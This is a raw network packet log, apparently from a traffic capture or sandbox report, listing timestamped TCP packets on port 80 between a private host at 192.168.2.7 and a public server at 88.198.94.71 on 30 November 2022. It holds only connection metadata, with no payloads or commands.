Nov 30, 2022 00:10:05.169586897 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169588089 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169652939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169652939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169869900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169888973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169920921 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169953108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169974089 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.169979095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.169997931 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170034885 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170067072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170098066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170099974 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170156002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170156002 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170233965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170258045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170277119 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170285940 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170295954 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170315027 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170319080 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170319080 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170332909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170352936 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170358896 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170358896 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170372009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.170393944 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170419931 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170419931 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.170995951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171014071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171037912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171056986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171082973 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171101093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171102047 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171118021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171120882 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171138048 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171139956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171165943 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171197891 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171416998 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171436071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171461105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171479940 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171504021 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171505928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171521902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171538115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171541929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171554089 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171561956 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.171593904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.171614885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.172100067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172115088 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172135115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172147989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172161102 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172183990 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.172188044 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172204018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172215939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172267914 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.172391891 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.172707081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172720909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172739029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172751904 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172765017 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172769070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.172776937 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172791004 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172795057 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.172804117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.172831059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.172909021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.173233986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173249006 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173300982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173314095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173331976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173341036 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.173345089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173358917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173367977 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.173376083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173383951 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.173389912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173403978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.173415899 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.173444986 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174518108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174532890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174551010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174565077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174577951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174585104 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174616098 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174626112 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174640894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174649000 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174654961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174668074 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174669981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174681902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174695015 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174699068 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174707890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174726009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174732924 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174738884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174756050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174765110 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174777985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174791098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174804926 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174817085 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174818039 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174832106 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174832106 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174853086 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174855947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174865961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174868107 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174887896 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174902916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174911022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174916029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174928904 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174930096 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174943924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174957037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174969912 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174969912 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.174976110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.174989939 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175003052 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175005913 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175030947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175045013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175057888 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175076962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175090075 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175097942 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175097942 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175102949 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175116062 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175122976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175122976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175129890 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175136089 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175195932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175195932 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175247908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175261021 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175295115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175307989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175332069 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175338030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175350904 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175367117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175367117 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175417900 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175431013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175448895 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175457954 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175462008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175481081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175502062 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175507069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.175546885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175662994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175662994 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.175987005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176004887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176018000 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176032066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176055908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176060915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176069975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176089048 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176100969 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176111937 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176122904 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176136971 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176141024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176141024 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176172018 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176182032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176182032 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176184893 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176203012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176227093 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176405907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176455975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176481009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176489115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176489115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176501036 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176512003 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176521063 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176539898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176558018 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176559925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176579952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176599026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176605940 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176605940 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176625013 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176644087 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.176666021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.176690102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.178488970 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.179617882 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.192800999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.192826986 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.192853928 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.192873001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.192895889 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.192912102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.192912102 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.192915916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.192940950 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.193078041 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.193701029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193725109 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193743944 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193763971 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.193797112 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.193814993 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193834066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193857908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193869114 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.193876982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193892956 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.193897009 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193916082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193934917 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193954945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.193962097 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.193990946 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.194001913 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194044113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194047928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.194065094 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194066048 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.194083929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194103003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194122076 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194123030 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.194140911 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194149971 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.194159985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194180012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.194194078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.194212914 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.194271088 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.197678089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.197698116 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.197722912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.197741985 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.197760105 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.197778940 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.197788000 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.197828054 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.197906017 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.198975086 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.198995113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.199019909 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.199038982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.199059010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.199062109 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.199078083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.199083090 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.199096918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.199115038 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.199210882 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.201809883 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.201829910 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.201853991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.201873064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.201895952 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.201910973 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.201915979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.201951981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.201966047 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.202235937 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.202871084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.202900887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.202943087 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.202972889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.203825951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.203845024 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.203867912 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.203923941 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.203931093 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.203953028 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.203980923 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.203984976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204005003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204029083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204047918 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204066992 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204082966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204086065 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204102993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204103947 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204123974 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204127073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204175949 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204297066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204315901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204339981 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204346895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204359055 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204384089 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204396009 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204402924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204417944 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204422951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204436064 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204442978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204463005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204468012 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204482079 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204500914 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204524994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204540014 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204544067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204560041 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204562902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204581022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.204581976 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.204602003 CET	80	49708	88.198.94.71	192.168.2.7
